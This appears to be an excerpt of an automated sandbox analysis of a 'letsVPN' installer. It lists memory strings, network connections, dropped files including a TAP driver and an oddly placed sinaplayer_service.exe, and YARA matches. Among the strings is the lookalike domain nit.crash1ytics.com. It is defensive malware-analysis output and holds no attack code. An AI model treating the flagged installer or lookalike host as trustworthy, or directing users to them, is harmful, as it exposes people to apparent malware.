              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/privacy.html
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/registerterm.html
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/terms.html
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/device
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicechecking
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/device
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceH
              Source: LetsPRO.exe, 0000003D.00000002.3421442999.000000000ED0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceHO
              Source: LetsPRO.exe, 0000003D.00000002.3421442999.000000000ED0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceHY
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.comhttpCode=-2
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.comx
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://pngimg.com/uploads/light/light_PNG14440.png
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://widget.intercom.io/widget/
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_00405705
              Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.0-------------- 0601021504Z0700114.114.114.114126.255.255.254169.254.255.255191.255.255.254223.255.255.254255.255.255.248476837158203125: cannot parse : no frame (sp=; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAccount-ExpiredAccount-TimeoutAddDllDirectoryAddMandatoryAceAreFileApisANSIBP_BUFFERFORMATBackupEventLogWCLSIDFromProgIDCLSIDFromStringCOLORADJUSTMENTCOMPOSITIONFORMCRYPTOAPI_BLOB_CRYPT_ATTRIBUTECRYPT_ATTR_BLOBCRYPT_DATA_BLOBCRYPT_HASH_BLOBCallWindowProcWClientAuthType(CoInitializeWOWColorAdjustLumaCompareFileTimeControl_RunDLLWCreateDataCacheCreateErrorInfoCreateHardLinkWCreateMailslotWCreateMetaFileWCreatePopupMenuCreateToolbarExCreateWindowExWCryptCreateHashCryptDestroyKeyCryptGetUserKeyCryptMemReallocCryptMsgControlDAD_DragEnterExDESKTOPENUMPROCDdeGetLastErrorDdeQueryStringWDdeUnaccessDataDdeUninitializeDefRawInputProcDefSubclassProcDeleteIPAddressDestinationAddrDeviceIoControlDialogBoxParamWDlgDirSelectExWDnsPolicyConfigDownload-FailedDragAcceptFilesDrawMenuBarTempDrawStatusTextWDrawThemeTextExDuplicateHandleECDSAP256SHA256ECDSAP384SHA384ENG_TIME_FIELDSENUMLOGFONTEXDVENUMRESLANGPROCEXPLICIT_ACCESSEmptyWorkingSetEnableScrollBarEngCreateBitmapEngEraseSurfaceEngFindResourceEngGradientFillEnumEnhMetaFileExcludeClipRectExtCreateRegionFailed to find Failed to load FindExecutableWFindNextStreamWFindNextVolumeWFindResourceExWFindVolumeCloseFlush dns cacheFlushIpNetTableFlushViewOfFileFreeAddrInfoExWGENERIC_MAPPINGGateway TimeoutGdiGradientFillGdiIsMetaFileDCGetActiveObjectGetActiveWindowGetAdapterIndexGetAdaptersInfoGetArcDirectionGetCharWidth32WGetClassInfoExWGetComboBoxInfoGetCommTimeoutsGetCommandLineWGetDCBrushColorGetDateFormatExGetDlgItemTextWGetEnhMetaFileWGetGraphicsModeGetGuiResourcesGetIpStatisticsGetKeyNameTextWGetKeyboardTypeGetLocaleInfoExGetMailslotInfoGetMenuItemRectGetMonitorInfoWGetNearestColorGetPolyFillModeGetProcessHeapsGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTapePositionGetTextMetricsWGetThemeIntListGetThemeMarginsGetThemeSysBoolGetThemeSysFontGetThemeSysSizeGetThreadLocaleGetTimeFormatExGetTitleBarInfoGetTrusteeFormWGetTrusteeNameWGetTrusteeTypeWGetWindowRgnBoxGlobalFindAtomWHanifi_RohingyaHasIPPacketInfoHost-Block-ListHost-Local-ListICreateTypeLib2IMEMENUITEMINFOIO_STATUS_BLOCKIP-Country-ListIP-Queue-LengthIP_ADAPTER_INFOIPersistStorageIShellItemArrayI_CryptAllocTlsI_RpcFreeBufferIcmp6CreateFileIcmpCloseHandleIcmpSendEcho2ExIdempotency-KeyImageList_MergeImageList_WriteImmIsUIMessageWImpersonateSelfInSendMessageExInitMUILanguageInsertMenuItemWIsBadStringPtrWIsHungAppWindowIsValidCodePageIsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2K32GetWsChangesKillSystemTimerLPCONDITIONPROCLPENUMFORMATETCLPFNDFMCALLBACKLPLOGCOLORSPACELPMESSAGEFILTERLPOLECLIENTSITELPPAGEPAINTHOOKLPPAGESETUPHOOKLPPRINTHOOKPROCLPSETUPHOOKPROCLPSHQUERYRBINFOLPWSAOVERLAPPEDLWBTBVCITWI2025Length RequiredLoadLibraryExAmemstr_1a7cdd13-5
              Source: Yara matchFile source: 61.2.LetsPRO.exe.68890000.21.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: letsvpn-latest.exe PID: 4488, type: MEMORYSTR
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, type: DROPPED
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB60F.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.catJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4D7.tmpJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.cat (copy)Jump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.cat (copy)Jump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00521660: CreateFileW,DeviceIoControl,CloseHandle,19_2_00521660
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,21_2_0040351C
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETBDCE.tmp
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETBDCE.tmp
              Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB5FE.tmp
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000CA800_2_000000018000CA80
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD0_2_00000001800057CD
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000583A0_2_000000018000583A
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800230400_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001A9B80_2_000000018001A9B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800152640_2_0000000180015264
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800192C80_2_00000001800192C8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180027AD40_2_0000000180027AD4
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000B35C0_2_000000018000B35C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180009BBC0_2_0000000180009BBC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001BBCD0_2_000000018001BBCD
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001AD680_2_000000018001AD68
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D700_2_0000000180010D70
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180017E2C0_2_0000000180017E2C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001DE340_2_000000018001DE34
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800236640_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018001FF380_2_000000018001FF38
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180025F480_2_0000000180025F48
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800267AC0_2_00000001800267AC
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052305019_2_00523050
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0053522019_2_00535220
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0053338019_2_00533380
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052340019_2_00523400
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052353019_2_00523530
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005255B019_2_005255B0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_005258F819_2_005258F8
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052395019_2_00523950
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00524B4019_2_00524B40
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00522D1019_2_00522D10
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00523FD019_2_00523FD0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0AAD6C19_2_6D0AAD6C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D114DB219_2_6D114DB2
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D140DB319_2_6D140DB3
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D09ADE519_2_6D09ADE5
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D090F3819_2_6D090F38
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0A4FC619_2_6D0A4FC6
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D090EAC19_2_6D090EAC
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D09A8CA19_2_6D09A8CA
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D118B4119_2_6D118B41
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0AEA8019_2_6D0AEA80
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D112AA919_2_6D112AA9
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D09E5DD19_2_6D09E5DD
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1404C219_2_6D1404C2
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1107DD19_2_6D1107DD
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0A018919_2_6D0A0189
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0C43CE19_2_6D0C43CE
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1263C719_2_6D1263C7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1542D819_2_6D1542D8
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0F1D6D19_2_6D0F1D6D
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D097F5A19_2_6D097F5A
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0B1E4B19_2_6D0B1E4B
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D131E6019_2_6D131E60
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D153EE519_2_6D153EE5
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D12B93019_2_6D12B930
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D09B87919_2_6D09B879
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D113BAC19_2_6D113BAC
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0ABA7819_2_6D0ABA78
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D111AB719_2_6D111AB7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D12D5A819_2_6D12D5A8
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0AD40E19_2_6D0AD40E
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D09B42B19_2_6D09B42B
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0A348619_2_6D0A3486
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D13B71019_2_6D13B710
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00406C5F21_2_00406C5F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBB4B827_2_00DBB4B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBB4AF27_2_00DBB4AF
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961924C833_2_00007FF7961924C8
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF79619354C33_2_00007FF79619354C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF79619653433_2_00007FF796196534
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796194B7433_2_00007FF796194B74
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0069789758_2_00697897
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0069392958_2_00693929
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00687B9158_2_00687B91
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068A54058_2_0068A540
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00692D5558_2_00692D55
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068A5ED58_2_0068A5ED
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess token adjusted: Load Driver
              Source: C:\Windows\System32\svchost.exeProcess token adjusted: Security
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: String function: 00688C30 appears 40 times
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: String function: 6D08EDFC appears 50 times
